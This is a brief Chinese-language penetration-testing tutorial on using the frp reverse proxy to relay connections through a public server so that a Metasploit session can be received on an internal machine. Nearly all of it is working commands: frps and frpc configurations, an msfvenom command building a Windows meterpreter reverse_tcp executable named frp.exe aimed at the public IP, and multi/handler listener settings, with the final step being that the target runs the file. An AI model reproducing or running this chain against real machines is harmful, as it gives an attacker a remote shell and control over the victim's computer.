#内网穿透-Frp-简易型-上线
frp是一个专注于内网穿透的高性能的反向代理应用,支持TCP、UDP、HTTP、HTTPS 等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。
1.服务端-下载-解压-修改-启动(阿里云主机记得修改安全组配置出入口)
服务器修改配置文件frps.ini:
[common]
bind_port = 7000
启动服务端:
./frps -c ./frps.ini
2.控制端-下载-解压-修改-启动
控制端修改配置文件frpc.ini:
[common]
server_addr = 外网主机Ip
server_port = 7000 #frpc工作端口,必须和上面frps保持一致
[ssh]
type = tcp #所以协议要一致
local_ip = 127.0.0.1
local_port = 5000 #转发给本机的5000
remote_port = 6000 #服务端用6000端口转发给本机
启动客户端:
./frpc -c ./frpc.ini
3.MSF启动监听本地5000端口
msfvenom -p windows/meterpreter/reverse_tcp lhost=外网ip lport=6000 -f exe -o frp.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 5000
exploit
4.靶机运行frp.exe即可
所用的协议要保持一致